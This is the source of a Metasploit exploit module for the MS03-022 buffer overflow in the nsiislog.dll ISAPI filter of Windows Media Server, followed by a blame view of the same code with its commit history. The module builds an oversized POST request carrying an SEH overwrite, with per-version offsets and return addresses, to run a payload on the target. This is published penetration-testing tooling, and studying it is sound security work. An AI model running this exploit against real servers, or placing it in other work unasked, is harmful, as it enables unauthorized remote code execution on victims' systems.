modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::BruteTargets
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
      'Description'    => %q{
          This exploits a buffer overflow found in the nsiislog.dll
        ISAPI filter that comes with Windows Media Server. This
        module will also work against the 'patched' MS03-019
        version. This vulnerability was addressed by MS03-022.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0349'],
          [ 'OSVDB', '4535'],
          [ 'BID', '8035'],
          [ 'MSB', 'MS03-022'],
          [ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # SEH offsets by version (Windows 2000)
          # 4.1.0.3917 =  9992
          # 4.1.0.3920 =  9992
          # 4.1.0.3927 =  9992
          # 4.1.0.3931 = 14092

          ['Brute Force',            { }],
          ['Windows 2000 -MS03-019', { 'Rets' => [  9988, 0x40f01333 ] }],
          ['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
          ['Windows XP   -MS03-019', { 'Rets' => [  9992, 0x40f011e0 ] }],
        ],
      'DisclosureDate' => '2003-06-25',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
      ])
  end

  def check
    res = send_request_raw({
      'uri' => normalize_uri(datastore['URL'])
    }, -1)

    if (res and res.body =~ /NetShow ISAPI/)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit_target(target)

    # Create a buffer greater than max SEH offset (16384)
    pst = rand_text_alphanumeric(256) * 64

    # Create SEH frame and insert into buffer
    seh = generate_seh_payload(target['Rets'][1])
    pst[target['Rets'][0], seh.length] = seh

    # Send it to the server
    print_status("Sending request...")
    res = send_request_cgi({
      'uri'          => normalize_uri(datastore['URL']),
      'method'       => 'POST',
      'user-agent'   => 'NSPlayer/2.0',
      'content-type' => 'application/x-www-form-urlencoded',
      'data'         => pst
    }, 5)

    select(nil,nil,nil,1)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GoodRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::BruteTargets`
			`include Msf::Exploit::Remote::Seh`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Microsoft module name changes 2014-03-28 20:56:53 -05:00			`'Name' => 'MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This exploits a buffer overflow found in the nsiislog.dll`
New modules, module renames 2005-12-26 14:34:22 +00:00			`ISAPI filter that comes with Windows Media Server. This`
			`module will also work against the 'patched' MS03-019`
			`version. This vulnerability was addressed by MS03-022.`
			`},`
			`'Author' => [ 'hdm' ],`
New licensing terms, revision bump to v3 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'References' =>`
			`[`
Reference updates 2006-11-28 17:18:43 +00:00			`[ 'CVE', '2003-0349'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '4535'],`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`[ 'BID', '8035'],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[ 'MSB', 'MS03-022'],`
			`[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",`
StackAdjustment added to most exploits, PNP tweaked 2006-07-31 02:01:14 +00:00			`'StackAdjustment' => -3500,`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[`
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`# SEH offsets by version (Windows 2000)`
			`# 4.1.0.3917 = 9992`
			`# 4.1.0.3920 = 9992`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`# 4.1.0.3927 = 9992`
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`# 4.1.0.3931 = 14092`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`['Brute Force', { }],`
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }],`
			`['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],`
			`['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2003-06-25',`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def check`
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`res = send_request_raw({`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`'uri' => normalize_uri(datastore['URL'])`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`}, -1)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (res and res.body =~ /NetShow ISAPI/)`
			`return Exploit::CheckCode::Detected`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def exploit_target(target)`
Retab modules 2013-08-30 16:28:54 -05:00
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`# Create a buffer greater than max SEH offset (16384)`
			`pst = rand_text_alphanumeric(256) * 64`
Retab modules 2013-08-30 16:28:54 -05:00
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`# Create SEH frame and insert into buffer`
			`seh = generate_seh_payload(target['Rets'][1])`
			`pst[target['Rets'][0], seh.length] = seh`
Retab modules 2013-08-30 16:28:54 -05:00
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`# Send it to the server`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`print_status("Sending request...")`
			`res = send_request_cgi({`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`'uri' => normalize_uri(datastore['URL']),`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'method' => 'POST',`
			`'user-agent' => 'NSPlayer/2.0',`
			`'content-type' => 'application/x-www-form-urlencoded',`
Complete rewrite of nsiislog_post, fixes #41 2007-03-10 07:23:25 +00:00			`'data' => pst`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`}, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
Fixes #2134 . Subs select for sleep in exploit modules. 2010-06-22 19:11:05 +00:00			`select(nil,nil,nil,1)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`handler`
			`disconnect`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`